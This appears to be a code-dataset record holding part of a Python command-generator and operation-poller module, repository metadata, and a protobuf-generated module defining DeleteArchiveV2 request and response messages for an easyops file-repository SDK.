def _Format(self, format_string, resource_ref, display_name=None):
"""Formats a string with all the attributes of the given resource ref.
Args:
format_string: str, The format string.
resource_ref: resources.Resource, The resource reference to extract
attributes from.
display_name: the display name for the resource.
Returns:
str, The formatted string.
"""
if resource_ref:
d = resource_ref.AsDict()
d[yaml_command_schema.NAME_FORMAT_KEY] = (
display_name or resource_ref.Name())
d[yaml_command_schema.REL_NAME_FORMAT_KEY] = resource_ref.RelativeName()
else:
d = {yaml_command_schema.NAME_FORMAT_KEY: display_name}
d[yaml_command_schema.RESOURCE_TYPE_FORMAT_KEY] = self.display_resource_type
return format_string.format(**d)
def _RegisterURIFunc(self, args):
"""Generates and registers a function to create a URI from a resource.
Args:
args: The argparse namespace.
Returns:
f(resource) -> str, A function that converts the given resource payload
into a URI.
"""
def URIFunc(resource):
id_value = getattr(
resource, self.spec.response.id_field)
ref = self.arg_generator.GetResponseResourceRef(id_value, args)
return ref.SelfLink()
args.GetDisplayInfo().AddUriFunc(URIFunc)
def _ConfigureGlobalAttributes(self, command):
"""Configures top level attributes of the generated command.
Args:
command: The command being generated.
"""
if self.spec.hidden:
command = base.Hidden(command)
if self.spec.release_tracks:
command = base.ReleaseTracks(*self.spec.release_tracks)(command)
if not hasattr(command, 'detailed_help'):
key_map = {
'description': 'DESCRIPTION',
'examples': 'EXAMPLES',
}
command.detailed_help = {
key_map.get(k, k): v for k, v in self.spec.help_text.items()}
command.detailed_help['API REFERENCE'] = (
'This command uses the *{}/{}* API. The full documentation for this '
'API can be found at: {}'.format(
self.method.collection.api_name, self.method.collection.api_version,
self.method.collection.docs_url))
def _GetDisplayName(self, resource_ref, args):
if (self.spec.arguments.resource
and self.spec.arguments.resource.display_name_hook):
return self.spec.arguments.resource.display_name_hook(resource_ref, args)
return resource_ref.Name() if resource_ref else None
class AsyncOperationPoller(waiter.OperationPoller):
"""An implementation of a operation poller."""
def __init__(self, spec, resource_ref, args):
"""Creates the poller.
Args:
spec: yaml_command_schema.CommandData, the spec for the command being
generated.
resource_ref: resources.Resource, The resource reference for the resource
being operated on (not the operation itself). If None, the operation
will just be returned when it is done instead of getting the resulting
resource.
args: Namespace, The args namespace.
"""
self.spec = spec
self.resource_ref = resource_ref
if not self.spec.async_.extract_resource_result:
self.resource_ref = None
self.method = registry.GetMethod(
spec.async_.collection, spec.async_.method,
api_version=spec.async_.api_version or spec.request.api_version)
self.args = args
def IsDone(self, operation):
"""Overrides."""
result = getattr(operation, self.spec.async_.state.field)
if isinstance(result, apitools_messages.Enum):
result = result.name
if (result in self.spec.async_.state.success_values or
result in self.spec.async_.state.error_values):
# We found a value that means it is done.
error = getattr(operation, self.spec.async_.error.field)
if not error and result in self.spec.async_.state.error_values:
error = 'The operation failed.'
# If we succeeded but there is an error, or if an error was detected.
if error:
raise waiter.OperationError(SerializeError(error))
return True
return False
def Poll(self, operation_ref):
"""Overrides.
Args:
operation_ref: googlecloudsdk.core.resources.Resource.
Returns:
fetched operation message.
"""
request_type = self.method.GetRequestType()
relative_name = operation_ref.RelativeName()
fields = {
f.name: getattr(
operation_ref,
self.spec.async_.operation_get_method_params.get(f.name, f.name),
relative_name)
for f in request_type.all_fields()}
request = request_type(**fields)
for hook in self.spec.async_.modify_request_hooks:
request = hook(operation_ref, self.args, request)
return self.method.Call(request)
def GetResult(self, operation):
"""Overrides.
Args:
operation: api_name_messages.Operation.
Returns:
result of result_service.Get request.
"""
result = operation
if self.resource_ref:
method = self._ResourceGetMethod()
request = method.GetRequestType()()
arg_utils.ParseResourceIntoMessage(self.resource_ref, method, request)
result = method.Call(request)
return _GetAttribute(result, self.spec.async_.result_attribute)
def _ResourceGetMethod(self):
return registry.GetMethod(
self.spec.request.collection, self.spec.async_.resource_get_method,
api_version=self.spec.request.api_version)
def SerializeError(error):
"""Serializes the error message for better format."""
if isinstance(error, six.string_types):
return error
try:
return json.dumps(
encoding.MessageToDict(error),
indent=2,
sort_keys=True,
separators=(',', ': '))
except Exception: # pylint: disable=broad-except
    # best effort; fall back to returning the error unchanged
return error
def _GetAttribute(obj, attr_path):
"""Gets attributes and sub-attributes out of an object.
Args:
obj: The object to extract the attributes from.
attr_path: str, The dotted path of attributes to extract.
Raises:
AttributeError: If the attribute doesn't exist on the object.
Returns:
The desired attribute or None if any of the parent attributes were None.
"""
if attr_path:
for attr in attr_path.split('.'):
try:
if obj is None:
return None
obj = getattr(obj, attr)
except AttributeError:
raise AttributeError(
'Attribute path [{}] not found on type [{}]'.format(attr_path,
type(obj)))
return obj
|
[
"zeus@localhost.localdomain"
] |
zeus@localhost.localdomain
|
4a51875b3edcd02fd9bbea7c81ba2ae177206124
|
bc441bb06b8948288f110af63feda4e798f30225
|
/file_repository_sdk/api/archive/delete_archive_v2_pb2.py
|
4e6598b19a4aa4e762abfd7d0d2de6f7c40ee8c6
|
[
"Apache-2.0"
] |
permissive
|
easyopsapis/easyops-api-python
|
23204f8846a332c30f5f3ff627bf220940137b6b
|
adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0
|
refs/heads/master
| 2020-06-26T23:38:27.308803
| 2020-06-16T07:25:41
| 2020-06-16T07:25:41
| 199,773,131
| 5
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| true
| 8,785
|
py
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: delete_archive_v2.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='delete_archive_v2.proto',
package='archive',
syntax='proto3',
serialized_options=None,
serialized_pb=_b('\n\x17\x64\x65lete_archive_v2.proto\x12\x07\x61rchive\"g\n\x16\x44\x65leteArchiveV2Request\x12\x12\n\ndeleteFile\x18\x01 \x01(\t\x12\x13\n\x0blastVersion\x18\x02 \x01(\t\x12\x11\n\tpackageId\x18\x03 \x01(\t\x12\x11\n\tversionId\x18\x04 \x01(\t\"U\n\x17\x44\x65leteArchiveV2Response\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\r\n\x05\x65rror\x18\x02 \x01(\t\x12\x0f\n\x07message\x18\x03 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x04 \x01(\t\"\x82\x01\n\x1e\x44\x65leteArchiveV2ResponseWrapper\x12\x0c\n\x04\x63ode\x18\x01 \x01(\x05\x12\x13\n\x0b\x63odeExplain\x18\x02 \x01(\t\x12\r\n\x05\x65rror\x18\x03 \x01(\t\x12.\n\x04\x64\x61ta\x18\x04 \x01(\x0b\x32 .archive.DeleteArchiveV2Responseb\x06proto3')
)
_DELETEARCHIVEV2REQUEST = _descriptor.Descriptor(
name='DeleteArchiveV2Request',
full_name='archive.DeleteArchiveV2Request',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='deleteFile', full_name='archive.DeleteArchiveV2Request.deleteFile', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='lastVersion', full_name='archive.DeleteArchiveV2Request.lastVersion', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='packageId', full_name='archive.DeleteArchiveV2Request.packageId', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='versionId', full_name='archive.DeleteArchiveV2Request.versionId', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=36,
serialized_end=139,
)
_DELETEARCHIVEV2RESPONSE = _descriptor.Descriptor(
name='DeleteArchiveV2Response',
full_name='archive.DeleteArchiveV2Response',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='archive.DeleteArchiveV2Response.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='archive.DeleteArchiveV2Response.error', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='message', full_name='archive.DeleteArchiveV2Response.message', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='archive.DeleteArchiveV2Response.data', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=141,
serialized_end=226,
)
_DELETEARCHIVEV2RESPONSEWRAPPER = _descriptor.Descriptor(
name='DeleteArchiveV2ResponseWrapper',
full_name='archive.DeleteArchiveV2ResponseWrapper',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='code', full_name='archive.DeleteArchiveV2ResponseWrapper.code', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='codeExplain', full_name='archive.DeleteArchiveV2ResponseWrapper.codeExplain', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='error', full_name='archive.DeleteArchiveV2ResponseWrapper.error', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='data', full_name='archive.DeleteArchiveV2ResponseWrapper.data', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=229,
serialized_end=359,
)
_DELETEARCHIVEV2RESPONSEWRAPPER.fields_by_name['data'].message_type = _DELETEARCHIVEV2RESPONSE
DESCRIPTOR.message_types_by_name['DeleteArchiveV2Request'] = _DELETEARCHIVEV2REQUEST
DESCRIPTOR.message_types_by_name['DeleteArchiveV2Response'] = _DELETEARCHIVEV2RESPONSE
DESCRIPTOR.message_types_by_name['DeleteArchiveV2ResponseWrapper'] = _DELETEARCHIVEV2RESPONSEWRAPPER
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
DeleteArchiveV2Request = _reflection.GeneratedProtocolMessageType('DeleteArchiveV2Request', (_message.Message,), {
'DESCRIPTOR' : _DELETEARCHIVEV2REQUEST,
'__module__' : 'delete_archive_v2_pb2'
# @@protoc_insertion_point(class_scope:archive.DeleteArchiveV2Request)
})
_sym_db.RegisterMessage(DeleteArchiveV2Request)
DeleteArchiveV2Response = _reflection.GeneratedProtocolMessageType('DeleteArchiveV2Response', (_message.Message,), {
'DESCRIPTOR' : _DELETEARCHIVEV2RESPONSE,
'__module__' : 'delete_archive_v2_pb2'
# @@protoc_insertion_point(class_scope:archive.DeleteArchiveV2Response)
})
_sym_db.RegisterMessage(DeleteArchiveV2Response)
DeleteArchiveV2ResponseWrapper = _reflection.GeneratedProtocolMessageType('DeleteArchiveV2ResponseWrapper', (_message.Message,), {
'DESCRIPTOR' : _DELETEARCHIVEV2RESPONSEWRAPPER,
'__module__' : 'delete_archive_v2_pb2'
# @@protoc_insertion_point(class_scope:archive.DeleteArchiveV2ResponseWrapper)
})
_sym_db.RegisterMessage(DeleteArchiveV2ResponseWrapper)
# @@protoc_insertion_point(module_scope)
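A hedged round-trip sketch using the generated messages above; the module is assumed importable from this file's repo location and all field values are placeholders:

from file_repository_sdk.api.archive import delete_archive_v2_pb2 as pb

req = pb.DeleteArchiveV2Request(
    deleteFile='true',  # all four fields are proto3 strings
    lastVersion='1.0.0',
    packageId='pkg-001',
    versionId='ver-001')
blob = req.SerializeToString()
same = pb.DeleteArchiveV2Request.FromString(blob)
assert same.packageId == 'pkg-001'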
|
[
"service@easyops.cn"
] |
service@easyops.cn
|